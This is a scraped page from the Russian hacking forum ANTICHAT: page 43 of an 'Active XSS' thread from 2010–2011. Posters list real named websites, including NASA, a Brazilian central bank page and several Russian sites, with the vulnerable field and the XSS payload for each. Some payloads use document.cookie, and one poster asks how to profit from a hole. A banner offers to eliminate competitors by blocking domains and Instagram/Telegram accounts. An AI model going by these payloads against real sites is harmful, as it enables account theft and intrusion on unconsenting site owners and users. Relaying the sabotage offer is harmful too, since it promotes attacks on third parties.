УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Активные Xss

Страница 43 из 54

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#421

30.10.2010, 19:48

<Cyber-punk>

Участник форума

Регистрация: 01.10.2009

Сообщений: 105

Провел на форуме:
559542

Репутация: 94

Отправить сообщение для <Cyber-punk> с помощью ICQ

http://www.dosug.cz/servlet/ru/recover

Вводим:

Цитата:

Сообщение от None

">alert(/xss/)

http://www.cadebou.pp.ru/ru/gb.php

http://www.laspodmoga.ru/gb.php

При ответе уязвимы все поля, кроме каптчи:

Цитата:

Сообщение от None

">alert(/xss/)

#422

13.11.2010, 01:59

Jokerll

Guest

Сообщений: n/a

Провел на форуме:
1723

Репутация: 0

http://www.a1tv.ru/msearch/?&o=

вводим

Код:

Code:
">alert(/Xss by Jokerll/)

Выходит -

http://www.a1tv.ru/msearch/?&o=">alert(/Xss by Jokerll/)

#423

13.11.2010, 03:20

[Feldmarschall]

Участник форума

Регистрация: 06.01.2010

Сообщений: 136

Провел на форуме:
568388

Репутация: 87

nasa в паб. http://buzzroom.nasa.gov/

там где написано "What's Happening?" меняем на:

">alert(document.cookie)

#424

14.11.2010, 20:00

warzi

Guest

Сообщений: n/a

Провел на форуме:
3067

Репутация: 0

mylove.ru активка в поле "интересы" в анкете ( а также в остальных полях там же). Не фильтруется вообще ничего, любой хтмл код лезет

Код:

Code:
Активка вида alert(/1/)

т.е. не закрываем тег (иначе будет видно в панели наверху)

Также, возможно, аналогичным образом уязвимы сайты-клоны lovegeek.ru и sex-znakomstva.tv

#425

20.11.2010, 19:08

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

PostgreSQL Foundry

http://pgfoundry.org/account/register.php

уязвимы все поля регистрации

">alert()

тИЦ 170, PR-7

#426

08.12.2010, 01:31

niva622

Новичок

Регистрация: 05.11.2008

Сообщений: 11

Провел на форуме:
93930

Репутация: 0

nnhost.ru

http://nnhost.ru/?p=5

все поля уязвимы

">alert()

#427

12.12.2010, 01:15

KREGI

Новичок

Регистрация: 09.02.2009

Сообщений: 23

Провел на форуме:
51759

Репутация: -9

ТИЦ 500

http://www.indarnb.ru/add-preview/

Уязвимы все поля

">alert(document.cookie)

#428

13.12.2010, 18:17

MikePro

Новичок

Регистрация: 30.01.2010

Сообщений: 0

Провел на форуме:
14728

Репутация: 0

20 000 хостов, ТиЦ 275

Код HTML:

HTML:
http://www.web-ip.ru/index.php?action=reg&r=1

Втавляем

Код HTML:

HTML:
">alert()

в поле E-mail.

как извлечь из этой дыры пользу не знаю Если есть идеи напишите плз

#429

16.12.2010, 23:52

ubi

Новичок

Регистрация: 25.12.2009

Сообщений: 18

Провел на форуме:
278340

Репутация: 0

http://www.it-monster.ru/register/typecandidate/

Уязвимое поле ICQ UIN

">alert(/xss/)

#430

13.01.2011, 14:36

Unknown

Guest

Сообщений: n/a

Провел на форуме:
34733

Репутация: 83

http://www.bcb.gov.br/?id=MINUTES&ano=%3Cscript%3Ealert('XSS')%3C/script%3E

Раздел сайта в DMOZ > Society > Government > Finance > Central_Banks

ТИЦ90 PR8

P.S Надеюсь модераторы оставят

Страница 43 из 54

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход